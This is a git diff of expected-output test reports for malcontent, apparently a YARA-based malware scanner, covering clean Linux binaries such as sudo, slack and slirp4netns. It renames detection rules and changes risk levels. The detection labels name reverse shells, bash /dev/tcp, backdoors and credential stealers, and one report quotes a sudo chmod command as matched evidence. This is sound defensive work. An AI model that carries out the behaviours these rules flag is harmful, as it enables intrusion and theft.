| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) |
| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) |
@@ -92,7 +94,6 @@
| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) |
| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple
index a941c2be7..6e31704e3 100644
--- a/tests/linux/clean/rules.json.simple
+++ b/tests/linux/clean/rules.json.simple
@@ -21,17 +21,17 @@ data/compression/bzip2: low
data/compression/lzma: low
data/compression/zstd: low
data/encoding/base64: low
-discover/system/network: high
+discover/multiple: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/name_get: medium
evasion/bypass_security/linux/iptables: medium
evasion/bypass_security/linux/ufw: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
evasion/process_injection/readelf: medium
exec/plugin: low
-exec/shell/bash_dev_tcp: high
exec/shell/bash_dev_udp: medium
exec/shell/nohup: medium
exec/system_controls/apparmor: medium
@@ -57,6 +57,7 @@ impact/exploit/cve: medium
impact/remote_access/iptables: medium
net/dns/servers: low
net/download: medium
+net/ftp/t: low
net/http/cookies: medium
net/socket/connect: medium
net/tcp/sftp: medium
diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple
index 37d595af0..61d126494 100644
--- a/tests/linux/clean/searchindex.json.simple
+++ b/tests/linux/clean/searchindex.json.simple
@@ -1,4 +1,4 @@
-# linux/clean/searchindex.json: high
+# linux/clean/searchindex.json: medium
3P/threat_hunting/dd: medium
3P/threat_hunting/keylogger: medium
anti-static/obfuscation/obfuscate: low
@@ -12,8 +12,9 @@ data/random/insecure: low
discover/components/docker: medium
discover/system/platform: low
discover/system/sysinfo: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/system_directory: medium
+evasion/rootkit/refs: medium
exec/install_additional/package_install: medium
exec/install_additional/pip_install: medium
exec/plugin: low
@@ -36,14 +37,13 @@ fs/path/usr_local: medium
fs/path/var: low
fs/path/var_log: medium
fs/watch: low
-impact/exploit: high
+impact/exploit: medium
impact/infection/infected: medium
impact/remote_access/agent: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
impact/remote_access/reverse_shell: medium
impact/remote_access/trojan: medium
impact/rootkit: medium
-impact/rootkit/refs: medium
net/dns/servers: low
net/dns/txt: low
net/download/fetch: medium
diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md
index fea449489..961ab3556 100644
--- a/tests/linux/clean/slack.md
+++ b/tests/linux/clean/slack.md
@@ -9,9 +9,9 @@
| MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#hex_parse) | converts hex data to ASCII | [Buffer.from(padded, 'hex')](https://github.com/search?q=Buffer.from%28padded%2C+%27hex%27%29&type=code) |
| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s)
[https://%s](https://%s) |
| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[endpoint_port](https://github.com/search?q=endpoint_port&type=code)
[firstIp](https://github.com/search?q=firstIp&type=code)
[hIp](https://github.com/search?q=hIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[multi_port](https://github.com/search?q=multi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[quiche_ip](https://github.com/search?q=quiche_ip&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[required_ip](https://github.com/search?q=required_ip&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[yoIp](https://github.com/search?q=yoIp&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) |
| MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) |
| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) |
| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [dropper](https://github.com/search?q=dropper&type=code) |
| MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) |
| MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBIterator](https://github.com/search?q=LevelDBIterator&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBPartitionedLock](https://github.com/search?q=LevelDBPartitionedLock&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKey](https://github.com/search?q=LevelDBScopesKey&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldbH](https://github.com/search?q=leveldbH&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) |
@@ -26,11 +26,13 @@
| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) |
| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) |
+| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
+| MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
| MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) |
| MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) |
| MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) |
-| MEDIUM | [evasion/covert_location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) |
+| MEDIUM | [evasion/file/location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) |
| MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) |
| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) |
| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
@@ -85,7 +87,6 @@
| MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) |
| MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) |
| MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) |
-| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) |
| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) |
| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) |
@@ -105,8 +106,9 @@
| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) |
| LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) |
| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) |
-| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) |
@@ -141,7 +143,6 @@
| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) |
| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) |
| LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code)
[bssid](https://github.com/search?q=bssid&type=code) |
-| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) |
| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) |
| LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) |
| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) |
@@ -174,7 +175,5 @@
| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
-| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple
index 290ed36cd..f64d4c66c 100644
--- a/tests/linux/clean/slirp4netns.simple
+++ b/tests/linux/clean/slirp4netns.simple
@@ -1,4 +1,4 @@
-# linux/clean/slirp4netns: high
+# linux/clean/slirp4netns: medium
anti-behavior/LD_DEBUG: medium
anti-behavior/LD_PROFILE: medium
c2/addr/ip: medium
@@ -9,12 +9,14 @@ credential/sniffer/bpf: medium
discover/group/lookup: medium
discover/network/interface_list: medium
discover/network/mac_address: medium
+discover/process/parent: low
+discover/system/dev_full: low
discover/system/platform: low
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
evasion/hide_artifacts/pivot_root: medium
evasion/hijack_execution/LD_LIBRARY_PATH: low
evasion/logging/acct: low
@@ -63,16 +65,13 @@ fs/tempdir/TMPDIR: low
fs/unmount: low
fs/watch: low
hw/cpu: medium
-impact/exploit/GCONV_PATH: low
impact/reboot: low
-impact/remote_access/reverse_shell: medium
lateral/scan/tool: medium
mem/anonymous_file: medium
net/dns/reverse: medium
net/dns/servers: low
net/dns/txt: low
net/download: medium
-net/download/fetch: high
net/ip/addr: medium
net/ip/icmp: low
net/ip/multicast_send: low
@@ -102,7 +101,6 @@ process/groupid_set: low
process/groups_set: low
process/multithreaded: low
process/namespace_set: low
-process/parent_pid_get: low
process/unshare: low
process/userid_set: low
sus/exclamation: medium
diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple
index dfa4e21ef..1d4bcdb3f 100644
--- a/tests/linux/clean/sonarlint-metadata.json.simple
+++ b/tests/linux/clean/sonarlint-metadata.json.simple
@@ -13,8 +13,8 @@ crypto/uuid: medium
data/encoding/json_decode: low
data/encoding/json_encode: low
discover/network/interface_list: medium
-evasion/covert_location/dev_mqueue: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/location/dev_mqueue: medium
+evasion/file/prefix: medium
exec/plugin: low
exfil/stealer/credit_card: medium
fs/file/copy: medium
diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple
index 50c4fb0a8..e1de0184e 100644
--- a/tests/linux/clean/sudo.simple
+++ b/tests/linux/clean/sudo.simple
@@ -1,11 +1,12 @@
# linux/clean/sudo: medium
credential/password: low
discover/network/interface_list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/parent: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/user/HOME: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/var_tmp: medium
+evasion/file/prefix: medium
evasion/process_injection/ptrace: medium
exec/plugin: low
exec/program: medium
@@ -38,6 +39,5 @@ privesc/sudoers: low
process/chroot: low
process/groupid_set: low
process/groups_set: low
-process/parent_pid_get: low
process/userid_set: low
sus/intercept: medium
diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple
index 5190dad6d..1864ab728 100644
--- a/tests/linux/clean/tracer.o.aarch64.simple
+++ b/tests/linux/clean/tracer.o.aarch64.simple
@@ -1,7 +1,6 @@
# linux/clean/tracer.o.aarch64: medium
c2/addr/ip: medium
collect/databases/mysql: medium
-credential/sniffer/bpf: medium
discover/network/netstat: medium
evasion/bypass_security/linux/iptables: medium
evasion/logging/acct: low
@@ -13,3 +12,4 @@ net/socket/listen: medium
net/socket/receive: low
net/socket/send: low
net/tcp/synflood: medium
+persist/kernel_module/symbol_lookup: low
diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md
index 80a679dae..f398b39de 100644
--- a/tests/linux/clean/tree-sitter.md
+++ b/tests/linux/clean/tree-sitter.md
@@ -1,46 +1,46 @@
## linux/clean/tree-sitter [🛑 HIGH]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|--------|-------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------